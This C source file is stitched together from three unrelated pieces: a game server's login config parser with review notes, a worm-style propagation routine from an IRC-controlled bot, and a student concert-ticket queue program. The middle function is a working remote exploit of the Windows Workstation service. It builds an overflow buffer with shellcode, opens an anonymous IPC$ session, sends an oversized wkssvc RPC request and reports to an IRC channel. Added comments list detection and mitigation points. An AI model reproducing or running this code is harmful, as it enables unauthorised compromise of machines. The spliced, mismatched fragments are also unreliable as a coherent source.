/**
 * Reading main configuration file.
 *
 * Each line is split at the first ':' into a key (w1) and a value (w2).
 * Lines that start with "//" and lines that do not yield both parts are
 * skipped. Keys are compared case-insensitively with strcmpi().
 *
 * @param cfgName: Name of the configuration (could be fullpath)
 * @param normal: Config read normally when server started; the keys bind_ip,
 *                login_port and console are only applied when this is true
 * @return True:success, False:failure (file not found|readable)
 */
bool login_config_read(const char* cfgName, bool normal) {
	char line[1024], w1[32], w2[1024];
	FILE* fp = fopen(cfgName, "r");
	if (fp == NULL) {
		ShowError("Configuration file (%s) not found.\n", cfgName);
		return false;
	}
	while(fgets(line, sizeof(line), fp)) {
		// Skip comment lines.
		if (line[0] == '/' && line[1] == '/')
			continue;
		// The field widths (31 and 1023) are one less than sizeof(w1) and
		// sizeof(w2), so an over-long key or value is truncated, not overflowed.
		if (sscanf(line, "%31[^:]: %1023[^\r\n]", w1, w2) < 2)
			continue;
		// Config that loaded only when server started, not by reloading config file
		if (normal) {
			if( !strcmpi(w1, "bind_ip") ) {
				login_config.login_ip = host2ip(w2);
				if( login_config.login_ip ) {
					char ip_str[16];
					ShowStatus("Login server binding IP address : %s -> %s\n", w2, ip2str(login_config.login_ip, ip_str));
				}
			}
			else if( !strcmpi(w1, "login_port") )
				// NOTE(review): atoi() reports no errors and the cast to uint16
				// silently wraps values outside 0..65535; a typo in the file can
				// therefore bind an unintended port.
				login_config.login_port = (uint16)atoi(w2);
			else if(!strcmpi(w1, "console"))
				login_config.console = (bool)config_switch(w2);
		}
		if(!strcmpi(w1,"timestamp_format"))
			// NOTE(review): the length 20 is hard-coded while the other copies
			// below use sizeof/ARRAYLENGTH of the destination; confirm that
			// timestamp_format is at least 20 bytes.
			safestrncpy(timestamp_format, w2, 20);
		else if(strcmpi(w1,"db_path")==0)
			safestrncpy(db_path, w2, ARRAYLENGTH(db_path));
		else if(!strcmpi(w1,"stdout_with_ansisequence"))
			stdout_with_ansisequence = config_switch(w2);
		else if(!strcmpi(w1,"console_silent")) {
			msg_silent = atoi(w2);
			if( msg_silent ) /* only bother if we actually have this enabled */
				ShowInfo("Console Silent Setting: %d\n", atoi(w2));
		}
		else if (strcmpi(w1, "console_msg_log") == 0)
			console_msg_log = atoi(w2);
		else if (strcmpi(w1, "console_log_filepath") == 0)
			safestrncpy(console_log_filepath, w2, sizeof(console_log_filepath));
		else if(!strcmpi(w1, "log_login"))
			login_config.log_login = (bool)config_switch(w2);
		else if(!strcmpi(w1, "new_account"))
			login_config.new_account_flag = (bool)config_switch(w2);
		else if(!strcmpi(w1, "new_acc_length_limit"))
			login_config.new_acc_length_limit = (bool)config_switch(w2);
		else if(!strcmpi(w1, "start_limited_time"))
			login_config.start_limited_time = atoi(w2);
		else if(!strcmpi(w1, "use_MD5_passwords"))
			// NOTE(review): what this switch changes is not visible here. If it
			// selects plain MD5 for stored passwords, that is a fast, unsalted
			// digest and a weak choice for credential storage - confirm.
			login_config.use_md5_passwds = (bool)config_switch(w2);
		else if(!strcmpi(w1, "group_id_to_connect"))
			login_config.group_id_to_connect = atoi(w2);
		else if(!strcmpi(w1, "min_group_id_to_connect"))
			login_config.min_group_id_to_connect = atoi(w2);
		else if(!strcmpi(w1, "date_format"))
			safestrncpy(login_config.date_format, w2, sizeof(login_config.date_format));
		else if(!strcmpi(w1, "allowed_regs")) //account flood protection system
			login_config.allowed_regs = atoi(w2);
		else if(!strcmpi(w1, "time_allowed"))
			login_config.time_allowed = atoi(w2);
		else if(!strcmpi(w1, "use_dnsbl"))
			login_config.use_dnsbl = (bool)config_switch(w2);
		else if(!strcmpi(w1, "dnsbl_servers"))
			safestrncpy(login_config.dnsbl_servs, w2, sizeof(login_config.dnsbl_servs));
		else if(!strcmpi(w1, "ipban_cleanup_interval"))
			login_config.ipban_cleanup_interval = (unsigned int)atoi(w2);
		else if(!strcmpi(w1, "ip_sync_interval"))
			// The cast applies to 1000 only, so the product is computed in
			// unsigned arithmetic; a negative value in the file wraps to a very
			// large interval instead of being rejected.
			login_config.ip_sync_interval = (unsigned int)1000*60*atoi(w2); //w2 comes in minutes.
		else if(!strcmpi(w1, "client_hash_check"))
			login_config.client_hash_check = config_switch(w2);
		else if(!strcmpi(w1, "client_hash")) {
			// Value format: "<group id>, <32 hex digits>" or "<group id>, disabled".
			int group = 0;
			char md5[33];
			// %32s leaves room for the terminator in md5[33].
			if (sscanf(w2, "%3d, %32s", &group, md5) == 2) {
				struct client_hash_node *nnode;
				CREATE(nnode, struct client_hash_node, 1);
				if (strcmpi(md5, "disabled") == 0) {
					nnode->hash[0] = '\0';
				} else {
					// Decode the hex text two characters at a time.
					// NOTE(review): nothing checks that md5 holds exactly 32 hex
					// digits. A shorter token makes this loop read the
					// uninitialised tail of md5, and when the inner sscanf()
					// matches nothing, byte is stored without ever being set.
					// The stored hash then differs from what the operator
					// configured; validate length and digits before decoding.
					// Assumes nnode->hash holds at least 16 bytes - TODO confirm.
					int i;
					for (i = 0; i < 32; i += 2) {
						char buf[3];
						unsigned int byte;
						memcpy(buf, &md5[i], 2);
						buf[2] = 0;
						sscanf(buf, "%2x", &byte);
						nnode->hash[i / 2] = (uint8)(byte & 0xFF);
					}
				}
				// Prepend the new node to the configured list.
				nnode->group_id = group;
				nnode->next = login_config.client_hash_nodes;
				login_config.client_hash_nodes = nnode;
			}
		}
		else if(strcmpi(w1, "chars_per_account") == 0) { //maxchars per account [Sirius]
/*
 * ScriptGod_WKSSVC - propagation routine of an IRC-controlled bot, aimed at
 * the Windows Workstation service RPC interface (named pipe "wkssvc").
 *
 * What the visible code does, in order:
 *   1. Fingerprints exinfo.ip with FpHost() and gives up unless the result is
 *      OS_WINXP.
 *   2. Assembles a 3500-byte string (filler, a replacement return address from
 *      the Targets table, then stack, decoder and encoded-shellcode parts that
 *      are defined elsewhere) and widens it to wchar_t.
 *   3. Opens a session to \\<ip>\ipc$ with empty user name and password, then
 *      opens \\<ip>\pipe\wkssvc for writing.
 *   4. Sends a DCE/RPC bind followed by a single request (opnum 27 or 25,
 *      chosen per target) whose second string argument is the oversized string.
 *   5. Announces "Exploiting IP" on the bot's IRC channel, logs the same text
 *      and increments the per-exploit counter.
 *
 * Returns TRUE once the request has been written; nothing here checks whether
 * the remote host was actually affected. Returns FALSE on any earlier failure.
 *
 * What a defender can observe from the above: an anonymous (null-session)
 * IPC$ connection, an open of the wkssvc pipe, a bind to interface
 * 6bffd098-a112-3610-9833-46c3f87e345a version 1, and a request with opnum 27
 * or 25 carrying a string argument thousands of characters long. Restricting
 * anonymous access to the pipe and applying the vendor fix for the Workstation
 * service are the corresponding mitigations.
 */
BOOL ScriptGod_WKSSVC( unsigned long nTargetID, EXINFO exinfo ) {
    int TargetOS;
    char szShellBuf[ 512 ];
    int iShellSize;
    // =============================
    char* pszTarget;
    // ---
    char szNetbiosTarget[ 8192 ];
    wchar_t wszNetbiosTarget[ 8192 ];
    unsigned char szShellcodeEncoded[ ( sizeof( szShellBuf ) * 2 ) + 1 ];
    unsigned char szExploitsData[ 3500 ];
    unsigned long nExploitsDataPos;
    wchar_t wszExploitsData[ sizeof( szExploitsData ) ];
    // ---
    char szIPC[ 8192 ];
    NETRESOURCE NetSource;
    // ---
    char szPipe[ 8192 ];
    HANDLE hPipe;
    // ---
    RPC_ReqBind BindPacket;
    unsigned long nBytesWritten;
    RPC_ReqNorm ReqNormalHeader;
    unsigned long nPacketSize;
    unsigned char* pPacket;
    unsigned long nPacketPos;
    // ============================

    // check if xp
    TargetOS = FpHost( exinfo.ip, FP_RPC );
    if( TargetOS != OS_WINXP )
        return FALSE;

    // parameters
    pszTarget = exinfo.ip;

    // get shellcode
    // (GetRNS0TerminatedShellcode, GetIP and filename are defined elsewhere;
    // a zero return is treated as failure)
    iShellSize = GetRNS0TerminatedShellcode( szShellBuf, sizeof( szShellBuf ), GetIP( exinfo.sock ), filename );
    if( !iShellSize )
        return FALSE;

    // generate exploits buffer
    // ========================
    memset( szShellcodeEncoded, 0, sizeof( szShellcodeEncoded ) );
    memset( szExploitsData, 0, sizeof( szExploitsData ) );
    memset( wszExploitsData, 0, sizeof( wszExploitsData ) );

    // fill with NOPs (using inc ecx instead of NOP, 0-terminated-string)
    memset( szExploitsData, 'A', sizeof( szExploitsData ) - 1 );

    // new EIP
    // (offset and value both come from the Targets table, which is not shown)
    *(unsigned long*)( &szExploitsData[ Targets[ nTargetID ].nNewEIP_BufferOffset ] ) = Targets[ nTargetID ].nNewEIP;

    // some NOPs
    nExploitsDataPos = 2300;

    // add stack
    memcpy( &szExploitsData[ nExploitsDataPos ], szStack, sizeof( szStack ) - 1 );
    nExploitsDataPos += sizeof( szStack ) - 1;

    // add decoder
    memcpy( &szExploitsData[ nExploitsDataPos ], szDecoder, sizeof( szDecoder ) - 1 );
    nExploitsDataPos += sizeof( szDecoder ) - 1;

    // add shellcode
    // - bind port
    // - encode
    Encode( (unsigned char*)szShellBuf, iShellSize, szShellcodeEncoded );
    // - add
    memcpy( &szExploitsData[ nExploitsDataPos ], szShellcodeEncoded, strlen( (char*)szShellcodeEncoded ) );
    nExploitsDataPos += strlen( (char*)szShellcodeEncoded );
    // - 0 terminaten for decoder
    szExploitsData[ nExploitsDataPos ] = 0;
    nExploitsDataPos += 1;

    // convert to UNICODE
    // ==================
    // Each byte is widened to one wchar_t; the library conversion is left
    // commented out below.
    for( int n = 0; n < sizeof( szExploitsData ); n++ )
        wszExploitsData[ n ] = szExploitsData[ n ];
    //MultiByteToWideChar( CP_ACP, 0, (char*)szExploitsData, -1, wszExploitsData, sizeof( wszExploitsData ) / sizeof( wchar_t ) );

    snprintf( szNetbiosTarget, sizeof( szNetbiosTarget ), "\\\\%s", pszTarget );
    mbstowcs( wszNetbiosTarget, szNetbiosTarget, sizeof( wszNetbiosTarget ) / sizeof( wchar_t ) );

    // create NULL session
    // ===================
    // Skipped when the target is "."; user name and password are both empty,
    // so this is the anonymous logon a host or network monitor would record.
    if( strcmpi( pszTarget, "." ) ) {
        snprintf( szIPC, sizeof( szIPC ), "\\\\%s\\ipc$", pszTarget );
        memset( &NetSource, 0 ,sizeof( NetSource ) );
        NetSource.lpRemoteName = szIPC;
        fWNetAddConnection2( &NetSource, "", "", 0 );
    }
    // ===================

    // connect to pipe
    // ===============
    snprintf( szPipe, sizeof( szPipe ), "\\\\%s\\pipe\\wkssvc", pszTarget );
    hPipe = CreateFile( szPipe, GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING, 0, NULL );
    if( hPipe == INVALID_HANDLE_VALUE ) {
        fWNetCancelConnection2( NetSource.lpRemoteName, 0, FALSE );
        return FALSE;
    }
    // ===============

    // bind packet
    // ===========
    memset( &BindPacket, 0, sizeof( BindPacket ) );
    BindPacket.NormalHeader.versionmaj = 5;
    BindPacket.NormalHeader.versionmin = 0;
    BindPacket.NormalHeader.type = 11; // bind
    BindPacket.NormalHeader.flags = 3; // first + last fragment
    BindPacket.NormalHeader.representation = 0x00000010; // little endian
    BindPacket.NormalHeader.fraglength = sizeof( BindPacket );
    BindPacket.NormalHeader.authlength = 0;
    BindPacket.NormalHeader.callid = 1;
    BindPacket.maxtsize = 4280;
    BindPacket.maxrsize = 4280;
    BindPacket.assocgid = 0;
    BindPacket.numelements = 1;
    BindPacket.contextid = 0;
    BindPacket.numsyntaxes = 1;
    // Interface1: these 16 bytes read as UUID 6bffd098-a112-3610-9833-46c3f87e345a
    // in little-endian wire order.
    BindPacket.Interface1.version = 1;
    memcpy( BindPacket.Interface1.byte, "\x98\xd0\xff\x6b\x12\xa1\x10\x36\x98\x33\x46\xc3\xf8\x7e\x34\x5a", 16 );
    // Interface2: reads as UUID 8a885d04-1ceb-11c9-9fe8-08002b104860
    // (presumably the transfer syntax of the bind - confirm against RPC_ReqBind).
    BindPacket.Interface2.version = 2;
    memcpy( BindPacket.Interface2.byte, "\x04\x5d\x88\x8a\xeb\x1c\xc9\x11\x9f\xe8\x08\x00\x2b\x10\x48\x60", 16 );

    // send
    if( !WriteFile( hPipe, &BindPacket, sizeof( RPC_ReqBind ), &nBytesWritten, NULL ) ) {
        CloseHandle( hPipe );
        fWNetCancelConnection2( NetSource.lpRemoteName, 0, FALSE );
        return FALSE;
    }
    // ===========

    // request
    // =======
    // generate packet
    // ---------------
    // calc packet size
    // (mirrors the layout written below: fixed prefix, two length-prefixed wide
    // strings each padded to a 4-byte boundary, 8 zero bytes, then a 4- or
    // 2-byte trailer depending on the chosen call)
    nPacketSize = 0;
    nPacketSize += sizeof( szWKSSVCUnknown1 ) - 1;
    nPacketSize += sizeof( UNISTR2 );
    nPacketSize += ( wcslen( wszNetbiosTarget ) + 1 ) * sizeof( wchar_t );
    while( nPacketSize % 4 )
        nPacketSize++;
    if( Targets[ nTargetID ].bCanUse_NetAddAlternateComputerName )
        nPacketSize += sizeof( szWKSSVCUnknown2 ) - 1;
    nPacketSize += sizeof( UNISTR2 );
    nPacketSize += ( wcslen( wszExploitsData ) + 1 ) * sizeof( wchar_t );
    while( nPacketSize % 4 )
        nPacketSize++;
    nPacketSize += 8; // szWSSKVCUnknown3
    if( Targets[ nTargetID ].bCanUse_NetAddAlternateComputerName )
        nPacketSize += 4; // NetAddAlternateComputerName = reserved
    else
        nPacketSize += 2; // NetValidateName = NameType

    // alloc packet
    pPacket = (unsigned char*)malloc( nPacketSize );
    if( !pPacket ) {
        CloseHandle( hPipe );
        fWNetCancelConnection2( NetSource.lpRemoteName, 0, FALSE );
        return FALSE;
    }
    memset( pPacket, 0, nPacketSize );

    // build packet
    nPacketPos = 0;

    // - szWKSSVCUnknown1
    memcpy( &pPacket[ nPacketPos ], szWKSSVCUnknown1, sizeof( szWKSSVCUnknown1 ) - 1 );
    nPacketPos += sizeof( szWKSSVCUnknown1 ) - 1;

    // - wszNetbiosTarget
    ( (UNISTR2*)&pPacket[ nPacketPos ] )->length = wcslen( wszNetbiosTarget ) + 1;
    ( (UNISTR2*)&pPacket[ nPacketPos ] )->unknown = 0;
    ( (UNISTR2*)&pPacket[ nPacketPos ] )->maxlength = ( (UNISTR2*)&pPacket[ nPacketPos ] )->length;
    nPacketPos += sizeof( UNISTR2 );
    wcscpy( (wchar_t*)&pPacket[ nPacketPos ], wszNetbiosTarget );
    nPacketPos += ( wcslen( wszNetbiosTarget ) + 1 ) * sizeof( wchar_t );

    // - align
    while( nPacketPos % 4 )
        nPacketPos++;

    // - szWKSSVCUnknown2
    if( Targets[ nTargetID ].bCanUse_NetAddAlternateComputerName ) {
        memcpy( &pPacket[ nPacketPos ], szWKSSVCUnknown2, sizeof( szWKSSVCUnknown2 ) - 1 );
        nPacketPos += sizeof( szWKSSVCUnknown2 ) - 1;
    }

    // - wszExploitsData
    // (the oversized string argument; its character count is what a protocol
    // decoder would see in the length fields of this UNISTR2 header)
    ( (UNISTR2*)&pPacket[ nPacketPos ] )->length = wcslen( wszExploitsData ) + 1;
    ( (UNISTR2*)&pPacket[ nPacketPos ] )->unknown = 0;
    ( (UNISTR2*)&pPacket[ nPacketPos ] )->maxlength = ( (UNISTR2*)&pPacket[ nPacketPos ] )->length;
    nPacketPos += sizeof( UNISTR2 );
    wcscpy( (wchar_t*)&pPacket[ nPacketPos ], wszExploitsData );
    nPacketPos += ( wcslen( wszExploitsData ) + 1 ) * sizeof( wchar_t );

    // - align
    while( nPacketPos % 4 )
        nPacketPos++;

    // - szWSSKVCUnknown3 (only eight 0x00s)
    memset( &pPacket[ nPacketPos ], 0, 8 );
    nPacketPos += 8;

    if( Targets[ nTargetID ].bCanUse_NetAddAlternateComputerName ) {
        // NetAddAlternateComputerName = 0
        *(DWORD*)&pPacket[ nPacketPos ] = 0;
        nPacketPos += sizeof( DWORD );
    } else {
        // NetValidateName = NetSetupMachine
        *(unsigned short*)&pPacket[ nPacketPos ] = 1;
        nPacketPos += 2;
    }

    // header
    memset( &ReqNormalHeader, 0, sizeof( ReqNormalHeader ) );
    ReqNormalHeader.NormalHeader.versionmaj = 5;
    ReqNormalHeader.NormalHeader.versionmin = 0;
    ReqNormalHeader.NormalHeader.type = 0; // request
    ReqNormalHeader.NormalHeader.flags = 3; // first + last fragment
    ReqNormalHeader.NormalHeader.representation = 0x00000010; // little endian
    ReqNormalHeader.NormalHeader.authlength = 0;
    ReqNormalHeader.NormalHeader.callid = 1;
    ReqNormalHeader.prescontext = 0;
    if( Targets[ nTargetID ].bCanUse_NetAddAlternateComputerName )
        ReqNormalHeader.opnum = 27; // NetrAddAlternateComputerName
    else
        ReqNormalHeader.opnum = 25; // NetrValidateName2

    // send
    if( !SendReqPacket_Part( hPipe, ReqNormalHeader, pPacket, nPacketSize, 4280, true ) ) {
        CloseHandle( hPipe );
        free( pPacket );
        fWNetCancelConnection2( NetSource.lpRemoteName, 0, FALSE );
        return FALSE;
    }
    // =======

    // clean up
    CloseHandle( hPipe );
    free( pPacket );
    fWNetCancelConnection2( NetSource.lpRemoteName, 0, FALSE );

    // Status report to the controlling IRC channel; the same line is written
    // to the bot's log and the per-exploit counter is incremented. This happens
    // after every successful send, whether or not the remote host was affected.
    char buffer[ IRCLINE ];
    _snprintf(buffer, sizeof(buffer), "[%s]: Exploiting IP: %s.", exploit[exinfo.exploit].name, exinfo.ip);
    irc_privmsg(exinfo.sock, exinfo.chan, buffer, exinfo.notice);
    addlog(buffer);
    exploit[exinfo.exploit].stats++;
    return TRUE;
}
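/*
 * Read one line from stdin into dst, which has room for cap bytes including
 * the terminator. The newline is dropped and any characters that do not fit
 * are discarded, so an over-long line can neither overflow dst nor spill into
 * the next prompt. Returns 1 when a line (possibly empty) was read, 0 on end
 * of input.
 */
static int read_input_line(char *dst, size_t cap)
{
    size_t len = 0;
    int ch;

    if (cap == 0)
        return 0;
    while ((ch = getchar()) != EOF && ch != '\n') {
        if (len + 1 < cap)
            dst[len++] = (char)ch;
    }
    dst[len] = '\0';
    return !(ch == EOF && len == 0);
}

/*
 * Menu loop of the concert ticket queue program: customers are queued per
 * ticket class (festival / tribun), served one at a time, and the income is
 * totalled. The loop ends when the user enters 0 or input runs out.
 *
 * Changes against the earlier version:
 *  - gets() is replaced by a bounded line reader, so a long name, phone number
 *    or ticket type can no longer write past the Data fields;
 *  - the ticket type is set before it is first compared (it used to be read
 *    uninitialised on the first visit to menu item 1);
 *  - the menu choice is read as a whole line and parsed, so non-numeric input
 *    is rejected instead of leaving menu unset and the input stuck.
 */
int main(void)
{
    /* Queues for the two ticket classes and a scratch record for new entries. */
    Queue QFest,QTribun;
    Data NewVal;
    double TotalJumlah=0,TotalT=0,TotalF=0;
    int menu;
    char menu_buf[16];

    /* Initialise both queues. */
    CreateEmpty(&QFest);
    CreateEmpty(&QTribun);

    do {
        system("CLS");
        printf("===== KONSER TONG TONG BAND =====\n");
        printf("1. Masukan Antrian \n");
        printf("2. Tampil Antrian Tribun \n");
        printf("3. Tampil Antrian Festival \n");
        printf("4. Transaksi Antrian Tribun \n");
        printf("5. Transaksi Antrian Festival \n");
        printf("6. Jumlah Pendapatan \n");
        printf("7. TUGAS - Jumlah Pendapatan \n");
        printf("================================= \n");
        printf(" >> Masukan Menu : ");

        if (!read_input_line(menu_buf, sizeof menu_buf))
            menu = 0;   /* end of input: leave the loop */
        else if (sscanf(menu_buf, "%d", &menu) != 1)
            menu = -1;  /* not a number: matches no menu item */

        switch(menu) {
        case 1 : /* enqueue a new customer */
            /* Start from a value that is neither ticket type so the prompt
             * loop below always asks at least once. */
            strcpy(NewVal.jenis_tiket,"-");

            /* sizeof gives the real capacity only if the Data fields are char
             * arrays, as the strcpy calls on them suggest - TODO confirm
             * against the Data declaration. */
            printf(" Nama : ");
            if (!read_input_line(NewVal.nama, sizeof NewVal.nama))
                break;
            printf(" No Hp : ");
            if (!read_input_line(NewVal.no_hp, sizeof NewVal.no_hp))
                break;

            /* Ask until a known ticket type is given (or input ends). */
            while(strcmpi(NewVal.jenis_tiket,"festival")!=0 && strcmpi(NewVal.jenis_tiket,"tribun")!=0) {
                printf(" Jenis Tiket(festival/tribun) : ");
                if (!read_input_line(NewVal.jenis_tiket, sizeof NewVal.jenis_tiket))
                    break;
            }

            if(strcmpi(NewVal.jenis_tiket,"festival")==0) {
                if (isFull(QFest)) {
                    printf("\n antrian penuh . . .");
                    break;
                }
                /* Assign the next ticket number, then enqueue. */
                NewVal.no_antrian=AutoID(&QFest);
                printf(" Nomor Tiket : %d \n",NewVal.no_antrian);
                Add(&QFest,NewVal);
            }
            if(strcmpi(NewVal.jenis_tiket,"tribun")==0) {
                if (isFull(QTribun)) {
                    printf("\n antrian penuh . . .");
                    break;
                }
                /* Assign the next ticket number, then enqueue. */
                NewVal.no_antrian=AutoID(&QTribun);
                printf(" Nomor Tiket : %d \n",NewVal.no_antrian);
                Add(&QTribun,NewVal);
            }
            break;

        case 2 : /* show the tribun queue */
            if (isEmpty(&QTribun)) {
                printf("\n antrian kosong . . .");
                break;
            }
            ShowQueue(QTribun);
            break;

        case 3 : /* show the festival queue */
            if (isEmpty(&QFest)) {
                printf("\n antrian kosong . . .");
                break;
            }
            ShowQueue(QFest);
            break;

        case 4 : /* serve the head of the tribun queue */
            if (isEmpty(&QTribun)) {
                printf("\n antrian kosong . . .");
                break;
            }
            printf("\n ====== Transaksi Tribun====== \n");
            JumlahPendapatan(QTribun,&TotalJumlah,&TotalT,&TotalF);
            Delete(&QTribun);
            break;

        case 5 : /* serve the head of the festival queue */
            if (isEmpty(&QFest)) {
                printf("\n antrian kosong . . .");
                break;
            }
            printf("\n ====== Transaksi Festival====== \n");
            JumlahPendapatan(QFest,&TotalJumlah,&TotalT,&TotalF);
            Delete(&QFest);
            break;

        case 6 : /* total income */
            printf("\n Total Pendapatan = %lf",TotalJumlah);
            break;

        case 7 : /* income per ticket class */
            printf("\n Total Pendapatan Tribun = %lf",TotalT);
            printf("\n Total Pendapatan Festival = %lf",TotalF);
            printf("\n---------------------------------------- ++");
            printf("\n Total Pendapatan = %lf",TotalT+TotalF);
            break;

        case 8 : /* debug view of the tribun queue indices */
            printf(" Head %d \n",QTribun.head);
            printf(" Tail %d \n",QTribun.tail);
            break;

        default :
            break;
        }
        /* Wait for a key so the output stays visible before the screen clears. */
        getch();
    } while(menu!=0);

    return 0;
}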